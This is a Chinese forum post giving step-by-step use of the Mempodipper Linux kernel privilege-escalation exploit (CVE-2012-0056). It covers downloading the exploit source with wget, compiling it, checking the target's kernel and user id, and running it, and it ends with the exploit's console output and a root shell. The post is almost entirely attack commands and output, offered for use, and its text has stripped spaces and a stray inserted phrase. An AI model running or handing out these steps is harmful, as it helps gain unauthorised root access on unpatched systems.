Linux2.6.39到3.2.0提权漏洞利用

[复制链接]
查看216 | 回复0 | 2012-4-1 19:15:33 | 显示全部楼层 |阅读模式
1.下载漏洞利用文件

wgethttp://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

 
2.编译

gccmempodipper.c-omempodipper

 
3.执行前察看

netcat@netcat:~$uname-r

3.0.0-12-generic

netcat@netcat:~$cat/etc/issue

Ubuntu11.10nl
netcat@netcat:~$uname-a

Linuxnetcat3.0.0-12-generic#20-UbuntuSMPFriOct714:50:42UTC2011i686i686i386GNU/Linux

netcat@netcat:~$id

uid=1000(netcat)gid=1000(netcat)组=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)

 
4.执行

netcat@netcat:~$./mempodipper

===============================

=Mempodipper=

=byzx2c4=

=Jan21,2012=

===============================
[+]Ptracingsutofindnextinstructionwithoutreadingbinary.

[+]Creatingptracepipe.

[+]Forkingptracechild.

[+]Waitingforptracedchildtogiveoutputonsyscalls.

[+]Ptrace_traceme’ingprocess.

[+]Errormessagewritten.Singlesteppingtofindaddress.

[+]Resolvedcalladdressto0×8049570.

[+]Openingsocketpair.

[+]Waitingfortran单机传奇erredfdinparent.

[+]Executingchildfromchildfork.

[+]Openingparentmem/proc/3012/meminchild.

[+]Sendingfd6toparent.

[+]Receivedfdat6.

[+]Assigningfd6tostderr.

[+]Calculatingsupadding.

[+]Seekingtooffset0×8049564.

[+]Executingsuwithshellcode.

sh-4.2#
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则